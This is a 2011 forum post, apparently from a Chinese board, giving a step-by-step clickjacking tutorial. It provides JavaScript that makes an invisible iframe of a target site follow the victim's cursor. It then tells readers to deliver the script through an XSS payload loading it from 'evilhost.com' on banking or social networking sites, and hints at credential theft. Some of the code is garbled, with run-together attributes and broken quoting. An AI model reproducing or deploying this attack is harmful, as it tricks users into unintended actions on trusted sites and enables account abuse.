jxau00001 发表于 2011-8-3 20:28:46

Clickjacking

Clickjacking


    1.Introduction

    ---->Clickjacking is the latest threat in the web world.It is quiet simple but the effective way.


    2.What is clickjacking?

---->In this attack victim is made to click the the attackerspage(button) regardless the knowledge of the victim.For the victim itseems that he is clicking the button of his/her trusted website but inactual that button were superposed by the frame of the attacker.Thereare two methods for this viz.Cursor tracking and Graphic overlay


-----------------------------------------------------------------Cursortracking-----------------------------------------------------------------------------

    In this method we will make an iframe and will make it to follow the victims cursor

what we want to do is to get the victim clicking on a specificbutton or link which will force him to make some action to the websitewe will load in a crafted invisible IFRAME.


3.First lets prepare the IFRAME in which we will load the button to be clicked


    Code:
Code:

<iframe id="victim"src="http://target.com/page.php" scrolling="no" style="opacity:0;position: absolute;left: 10;bottom: 10;"width="500px;"></iframe>


    Note that we have made scrolling off and opacity to 0 so as to make the page invisible to victim.

The position of the page inside the IFRAME depends on where thevictim should click,you can fix it using :- margin-top:x; margin-left=x;


    4.Make a javascript function to make IFRAME follow the victims cursor

    Code:
    Code:

function getPosition(e)
    {
            e = e || window.event;
            var cursor = {x:0, y:0};
                   if (e.pageX || e.pageY)
            {
                           cursor.x = e.pageX;
                           cursor.y = e.pageY;
                  }
               else
            {
                           var de = document.documentElement;
                           var b = document.body;
                           cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
                           cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
                  }
            
            return cursor;
    }


    This function retrieve the X and Y coordinates of the victim's cursor in the webpage everytime it gets called

    Code:
Code:

function clickjacking(e)
    {
            var loadFrame = document.getElementById("victim");
            var curPos = getPosition(e);
    loadFrame.setAttribute('style','opacity:0;position:absolute;top:' + (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
    }

Again, this one loads the IFRAME, calls the previous "getPosition"function and changes the style attributes of the loaded IFRAME with thenew coordinates
    retrieved from the cursor tracking function.

    Code:
    Code:

window.captureEvents(Event.MOUSEMOVE);
    window.onmousemove=clickjacking;


This will call the MOUSEMOVE Event handler and make the"clickjacking" function be called at each user's cursor movement insidethe webpage.

    Now let's make our JavaScript print out the IFRAME inside the HTML code with document.write:

    Code:
Code:

document.write("<iframeid="victim" src="http://target.com/page.php" scrolling="no"style="opacity: 0;position: absolute;left: 10;bottom: 10;"width="500px;"></iframe>");


    5.Our final javascript code combining all the above module will be


    Code:

function getPosition(e)
    {
         e = e || window.event;
         var cursor = {x:0, y:0};

         if (e.pageX || e.pageY)
      {
            cursor.x = e.pageX;
            cursor.y = e.pageY;
             }
         else
      {
            var de = document.documentElement;
            var b = document.body;
            cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
            cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
             }
         
         return cursor;
    }

    function clickjacking(e)
    {
         var loadFrame = document.getElementById("victim");
         var curPos = getPosition(e);
      loadFrame.setAttribute('style','opacity:0;position:absolute;top:' +(curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
    }

    window.captureEvents(Event.MOUSEMOVE);
    window.onmousemove=clickjacking;

    document.write("<iframe id="victim"src="http://target.com/page.php" scrolling="no" style="opacity:0;position: absolute;left: 10;bottom: 10;"width="500px;"></iframe>");


    save it as clickjacking.JavaScript


    6.Final step

Now knowing the victims common page such as ebanking website orsocial networking website etc which is vulnerable to XSS,you can deploythe attack as
    Code:
   http://www.xxx.com]http://www.xxx.com

    Code:
Code:

?something=<script src=http://evilhost.com/clickjacking.JavaScript></script>



    7.Conclusion

    Clickjacking works with XSS,so think beyond ****** stealing.Enjoy!!!!!!!
页: [1]
查看完整版本: Clickjacking